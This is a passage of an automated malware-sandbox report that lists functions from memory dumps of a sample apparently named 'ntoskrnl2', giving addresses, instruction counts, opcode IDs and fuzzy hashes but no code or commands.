                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8eafbb02e51e1bae57bc8aa1e805098e6c13f9a77bc0c14265ed29b8bbb122d1
                                                                              • Instruction ID: 75acb2ee682a0e962e42f599add7219d49e795341a5a77a6864561d298ef0123
                                                                              • Opcode Fuzzy Hash: 8eafbb02e51e1bae57bc8aa1e805098e6c13f9a77bc0c14265ed29b8bbb122d1
                                                                              • Instruction Fuzzy Hash: C7316431A0C959CFDF9CEF28C465AA573E1FF6971070406A9D10AC7696CF24EC45CB81
                                                                              Function 00007FF8492F7315 Relevance: .1, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1c7b21ccc6f6a99dede4f17bbea26ceff42109291ea68ba9f3b5b44665299e0
                                                                              • Instruction ID: 4898eea97e358d08fb8b8ddf979626ffacdc7eb54d36e937cd982cfa390aa9d5
                                                                              • Opcode Fuzzy Hash: f1c7b21ccc6f6a99dede4f17bbea26ceff42109291ea68ba9f3b5b44665299e0
                                                                              • Instruction Fuzzy Hash: AD313D3091C5AAEFFB68EF5484515BD7BB5FF84380F50017AD82ED6189CB38AA48A741
                                                                              Function 00007FF848F2155D Relevance: .1, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: be6b9da27bc763c670f0229b5d4d0d4af7ed490511b520acbb72e73630308919
                                                                              • Instruction ID: 22c92f5b9b1504dec9c331aed571c4bc63efdb76e6d9b9f29e5e679e51ebab30
                                                                              • Opcode Fuzzy Hash: be6b9da27bc763c670f0229b5d4d0d4af7ed490511b520acbb72e73630308919
                                                                              • Instruction Fuzzy Hash: 7F31D332A0D2998FE702FBB8A8152DDBBB0FF51361F1401B7C144C71C2DB3866898799
                                                                              Function 00007FF8492F472A Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3366ad09383d8cfcf83d3154537d1c0b553493b4242b724f394e081a47ce3ca4
                                                                              • Instruction ID: 31f1454dda628583c6adc34bfb8f64175c1fa411bd56bd7640490eb34da8aaf0
                                                                              • Opcode Fuzzy Hash: 3366ad09383d8cfcf83d3154537d1c0b553493b4242b724f394e081a47ce3ca4
                                                                              • Instruction Fuzzy Hash: 0531E831E1CA9A8FFB68FB6894162F8B7E2FF45354F500679C02DC72CADE5864418381
                                                                              Function 00007FF8492F2305 Relevance: .1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32752d0b1a4ea0a23b08b24a8be710e28a2141c8b29eee8c4c5cd8a655ccacb6
                                                                              • Instruction ID: f0c6be26fa995e44510cb6e743e9ee0d1aa6bed10aaa0a0472a508e4ce5b2e68
                                                                              • Opcode Fuzzy Hash: 32752d0b1a4ea0a23b08b24a8be710e28a2141c8b29eee8c4c5cd8a655ccacb6
                                                                              • Instruction Fuzzy Hash: 183137B0D0C9AACFFBA8EF5484515BD77B1FF46390F5000BAD42ED6189CB386848AB41
                                                                              Function 00007FF848F212E8 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8e82af6987b9c877987c43ca38891896bb93ae06d225e843b3b4cfcf6525bc64
                                                                              • Instruction ID: 135980a7753756cd1e2b08005447c2b1d204b86471e981082642b638375fda9c
                                                                              • Opcode Fuzzy Hash: 8e82af6987b9c877987c43ca38891896bb93ae06d225e843b3b4cfcf6525bc64
                                                                              • Instruction Fuzzy Hash: 18213431B2DA9A4FE788F72CA45D77976C2EB98351F5404B9E80DC32D3DE19AC418288
                                                                              Function 00007FF8492F6200 Relevance: .1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cc48db46cd98ca8e38d639881394281cb63b5e9286700b08818f76d128a6eeb0
                                                                              • Instruction ID: ea308e90726cd1045706634a9da1b08fae2e962c1fa0072d0a2c092afd81ef31
                                                                              • Opcode Fuzzy Hash: cc48db46cd98ca8e38d639881394281cb63b5e9286700b08818f76d128a6eeb0
                                                                              • Instruction Fuzzy Hash: 3231491095C5FACFFB3A9B5884705747B62EF6630071846FAC0A68B48FC92CEA84E341
                                                                              Function 00007FF8492F11F0 Relevance: .1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dadf07cbdf1562cc5fc3cadcee63cceb1fe56c14c615e338ac4aa549a98c6a03
                                                                              • Instruction ID: d4b8e87d9aa37d6149f1158581a9c3a537e9c33ff1388cdbb45091bfb4e6082b
                                                                              • Opcode Fuzzy Hash: dadf07cbdf1562cc5fc3cadcee63cceb1fe56c14c615e338ac4aa549a98c6a03
                                                                              • Instruction Fuzzy Hash: 8631592091C5F6CEFB39975984609B47B62EF5234575846FAC0A7DB0CFC82CB885E381
                                                                              Function 00007FF8492F3602 Relevance: .1, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c89e66c2be921ac87cc5e0e2b6b7d7d5f73bb08ffb9b387251335e3080cbc612
                                                                              • Instruction ID: 3a98bf2eca77e7b3ef6cf1a8aeea828118b85e534141fa8fce23ea8850e2d7e4
                                                                              • Opcode Fuzzy Hash: c89e66c2be921ac87cc5e0e2b6b7d7d5f73bb08ffb9b387251335e3080cbc612
                                                                              • Instruction Fuzzy Hash: 1A21F630E0885D9FDF99EF18C4A5AE9B7B1FB68354F1041AAD00EE3295CF35A980CB40
                                                                              Function 00007FF8492F2AB8 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cde29d00a71db28989832578d202c65790694fdb624a1402a172473f161f5257
                                                                              • Instruction ID: 987be13d974073f9c4e0c05da9cde21c9585b25852c21817dffb27a079f3dc18
                                                                              • Opcode Fuzzy Hash: cde29d00a71db28989832578d202c65790694fdb624a1402a172473f161f5257
                                                                              • Instruction Fuzzy Hash: BC218931D1C9AEDFEB64EF58C490AADBBB1FF58340F100439D00AE3285CB286801DB50
                                                                              Function 00007FF848F20CB9 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9680b48a2d1701f32c4714d70751153695e07d28a5de61bb64aedc1599198c41
                                                                              • Instruction ID: 8c02dd72c72257d9a73f4e3be4e6e5929ebd913e838d3dfa68ec68e300a7eefc
                                                                              • Opcode Fuzzy Hash: 9680b48a2d1701f32c4714d70751153695e07d28a5de61bb64aedc1599198c41
                                                                              • Instruction Fuzzy Hash: 7E2165A2A0E7560AE379762C7C512757FE1DFC5280F58027AD89AC22C3EE0EA8054398
                                                                              Function 00007FF848F20868 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9764664556fc1b805c898dfc383d7b8aa325eb986fe1fc55ec03396ced6a8c74
                                                                              • Instruction ID: 7939701932a3ea6a8892fdf21b2aa77234428aa91236d3764f1c62507b58c9f0
                                                                              • Opcode Fuzzy Hash: 9764664556fc1b805c898dfc383d7b8aa325eb986fe1fc55ec03396ced6a8c74
                                                                              • Instruction Fuzzy Hash: 9C11E33295C7984FD764BB2898495FB7BE0FB89265F10063FE89AD2281EB3094058782
                                                                              Function 00007FF8492F6230 Relevance: .1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 027613c04f75eca56f3a95d7c56f37660586321eeab7d40f41b49766cdadf3ae
                                                                              • Instruction ID: 0c4de4f2492a5794ed4a8d05be4a672d05b976848f8008f9cd39d47ced16eaaa
                                                                              • Opcode Fuzzy Hash: 027613c04f75eca56f3a95d7c56f37660586321eeab7d40f41b49766cdadf3ae
                                                                              • Instruction Fuzzy Hash: AF11BB2091C4BECEFD389A4884649B47256EBA83417144B75C07B8758EC93CFAC5E385
                                                                              Function 00007FF8492F1220 Relevance: .1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97ea39fca0aa0b7cdda061a09a0dc50378afa162d79b4337184ffedd26956156
                                                                              • Instruction ID: c7b4630aa4f23246fb7e0e53f0163749324fd59f91c6be8c020c97fe83e6f622
                                                                              • Opcode Fuzzy Hash: 97ea39fca0aa0b7cdda061a09a0dc50378afa162d79b4337184ffedd26956156
                                                                              • Instruction Fuzzy Hash: 3411EB2092C4BBCEFE389A49C090DB47252FF50345B544ABAD16BDB4CFC82CB981E781
                                                                              Function 00007FF8492F52B0 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 11d32090b3b0ff693a6e0fa0fa90daf2001aba97ede7ae61eaa0d6b57122487f
                                                                              • Instruction ID: 5e43148028672cf2e0a232528b765cdc95e6e00da40b07d24872b171532bf225
                                                                              • Opcode Fuzzy Hash: 11d32090b3b0ff693a6e0fa0fa90daf2001aba97ede7ae61eaa0d6b57122487f
                                                                              • Instruction Fuzzy Hash: C711C631A19A4A8FEB64FF2490019F673A1FF54395F40093AE10EC36C6CF2DB4058394
                                                                              Function 00007FF8492F02A0 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28f8c074e5826e16607bc221123ba8589776083edeba2278dde39713ee60309b
                                                                              • Instruction ID: 7eba1c0cd4dd23f9d2261eb3d41f45c0de1f608ef90b660e4046479984175e80
                                                                              • Opcode Fuzzy Hash: 28f8c074e5826e16607bc221123ba8589776083edeba2278dde39713ee60309b
                                                                              • Instruction Fuzzy Hash: B611A331A59A4A8FFA64FB1490515F6B3A1FF54295F40093AE10EC36C6CF2CB405C350
                                                                              Function 00007FF848F21588 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa45312c868a3900a5daffd8d11bd287bd394ff4c789289d9f9794e6edda308a
                                                                              • Instruction ID: ffbd9cf26cbe2fa80091a4aa54ffcbf16d99b97beced5d6fd047eb0b9c582d57
                                                                              • Opcode Fuzzy Hash: fa45312c868a3900a5daffd8d11bd287bd394ff4c789289d9f9794e6edda308a
                                                                              • Instruction Fuzzy Hash: 2711AC32A0D6898FE702FBB8D85519CBBB0FF41361F1842F7D094DB2C2E63866498784
                                                                              Function 00007FF848F21E1D Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f8be16ad9daea0172591ee692329a07c87cb1409d19e7153be25b321ae0700c3
                                                                              • Instruction ID: ef838c49aaba0fb6274d9da1000f5d4454d8ecab0d7cb3464bf449b7b7eec490
                                                                              • Opcode Fuzzy Hash: f8be16ad9daea0172591ee692329a07c87cb1409d19e7153be25b321ae0700c3
                                                                              • Instruction Fuzzy Hash: A101F23088EAE61FD36A67B4AC215A23FA0DF87550B0901FAD085CB5E3C94E2882C365
                                                                              Function 00007FF8492F512E Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 25a201e61a85723a1797f2ab4323b85f80483ee7f205127fce1cfc5dca5da034
                                                                              • Instruction ID: 4f6fc121bcaf0c5a490f1cf9851eef811b25348e065b1568b1aa7edf674a6298
                                                                              • Opcode Fuzzy Hash: 25a201e61a85723a1797f2ab4323b85f80483ee7f205127fce1cfc5dca5da034
                                                                              • Instruction Fuzzy Hash: A101C03160954B8FFB24AE58E455AF57392EB54396F10463AE62DC37C5CB29A8608780
                                                                              Function 00007FF8492F011E Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfd19166ffc1f79f1ad95cffcad0d19717517a9c89567750c0ac229c219b05da
                                                                              • Instruction ID: 8abaa020330509b21f337439c1c09e8d66a0f4311379a67c8e50ab184bb05211
                                                                              • Opcode Fuzzy Hash: cfd19166ffc1f79f1ad95cffcad0d19717517a9c89567750c0ac229c219b05da
                                                                              • Instruction Fuzzy Hash: 0E01003164954A8FFB64AE48E4506E67392EB54395F10453BEA1DC36C5CB29A8608790
                                                                              Function 00007FF848F21590 Relevance: .1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd2a6e6e7e3eb3fc677bd909f3f4c130deb4bef9c83d0425e01f49a30b4a411d
                                                                              • Instruction ID: f307069bc66060e2aea741e339c1fd42f7ea4fac119f475491363390652e641f
                                                                              • Opcode Fuzzy Hash: bd2a6e6e7e3eb3fc677bd909f3f4c130deb4bef9c83d0425e01f49a30b4a411d
                                                                              • Instruction Fuzzy Hash: 88018B31A0D6898FE702EBB8985519DBBB0EF02351F1842F7D044DB292E63866498784
                                                                              Function 00007FF848F21598 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5591b72c6c79205f01883c6769bd5d1f956d0ed4acf34a628476729d56e3ef0e
                                                                              • Instruction ID: 37264bc085347f96355ebcd137854c9081b9ae6346d9e9f962f8625712115034
                                                                              • Opcode Fuzzy Hash: 5591b72c6c79205f01883c6769bd5d1f956d0ed4acf34a628476729d56e3ef0e
                                                                              • Instruction Fuzzy Hash: F3014C31A0D6898FE702EBB8985519DBFB0EF06351F1842E6D045DB2D2EA3966888749
                                                                              Function 00007FF848F215A0 Relevance: .0, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 41988eeff6baba1e0cc1c0027e35576cceef960f31ac99266584d7a0f75da0fc
                                                                              • Instruction ID: 29950ec6e6b08d5d1e952aa10690531af4e18397ec1ac11ab5f0bc4a1ecac7c2
                                                                              • Opcode Fuzzy Hash: 41988eeff6baba1e0cc1c0027e35576cceef960f31ac99266584d7a0f75da0fc
                                                                              • Instruction Fuzzy Hash: C4018B31D0D2898FE702EBB898541AD7FB0FF06350F1842E6D045DB2D2EA396A84C748
                                                                              Function 00007FF8492F3912 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dcca886b786c53439afad729a3586b399c5ea63cc7bd3fe49f822e0fffa0ad2
                                                                              • Instruction ID: f81f737e228ee02c169b289a876947daecef47edd4826deca6900b3324b9c9e7
                                                                              • Opcode Fuzzy Hash: 8dcca886b786c53439afad729a3586b399c5ea63cc7bd3fe49f822e0fffa0ad2
                                                                              • Instruction Fuzzy Hash: 57F0963284E2C6DFE316EF7088515EA7FE4EF43280F1801FAD459CB0A6CA2C5646D761
                                                                              Function 00007FF848F21E50 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2d24e0d4074603e70e75bdccbe1f5a1873fd97250bea7f9d5fb4724f962ff9e
                                                                              • Instruction ID: 1494b745a622302029248508db72aeae8b94a20e42301a0563e04564b8128ebd
                                                                              • Opcode Fuzzy Hash: b2d24e0d4074603e70e75bdccbe1f5a1873fd97250bea7f9d5fb4724f962ff9e
                                                                              • Instruction Fuzzy Hash: 30E02630D4C85A1BD76CB674B8612B57380EB85614F0401BDD41AC26C2DD0D1CC18281
                                                                              Function 00007FF8492FC6AD Relevance: .0, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fdfa8c8b29d6700953fb9beafcd049d7011bedbac0c8999831d5ecb7bf97264a
                                                                              • Instruction ID: 00ade28ffb2a96b5a2e43e2e41302a80202822face80d2d85ec9a52799531a48
                                                                              • Opcode Fuzzy Hash: fdfa8c8b29d6700953fb9beafcd049d7011bedbac0c8999831d5ecb7bf97264a
                                                                              • Instruction Fuzzy Hash: A6E01A30A4C91D8FF664FF449848BB93292EBA4351F050279D019C72DADE68A945A780
                                                                              Function 00007FF848F24D19 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction ID: a0ef43eac895e8919646699a1fb25f6cbc23e39a4773cea35b8ca63caf33e1e7
                                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction Fuzzy Hash: 82E0ED30E0C01A4AFB54A684E850BB96251EB48350F1040B8D94EE32C1DE3DAE45DB6D
                                                                              Function 00007FF8492F460D Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 193753a53d351dbb7373505e36eeb493bfcadf5dc56aece67cbee80e5953d53b
                                                                              • Instruction ID: 958d74cff139e77ad5828c33f495da460a8f060b40074c7caa23358b863ca618
                                                                              • Opcode Fuzzy Hash: 193753a53d351dbb7373505e36eeb493bfcadf5dc56aece67cbee80e5953d53b
                                                                              • Instruction Fuzzy Hash: F2D05E01D0DED28FF736A920087D1782B915F06788B4805B5C029862CBD98C2909A752
                                                                              Function 00007FF848F22759 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd233c906372fa1cf4f3cfb251d4d8cab9cfb833b18533bb6d2e6709ed772239
                                                                              • Instruction ID: 4c870258a67a5a1ef3dba16b9f99b098dce41c7ed38fd0dba401051373db26ea
                                                                              • Opcode Fuzzy Hash: bd233c906372fa1cf4f3cfb251d4d8cab9cfb833b18533bb6d2e6709ed772239
                                                                              • Instruction Fuzzy Hash: 85D0A730D1C4498FDB51DA04C498768F791FB08340F1446A0C80CD3281C735DE81DB40
                                                                              Function 00007FF848F21765 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction ID: 5c3c5e2eabfd9e4a72f26667cad19bcf432ea7efe5585b19d926a11c802f8f9c
                                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction Fuzzy Hash: A9C08C34529808CFC908FB2DC88890833B0FB0A304BC200A0E40DC72B1D21AECD2D782
                                                                              Function 00007FF848F20705 Relevance: .0, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
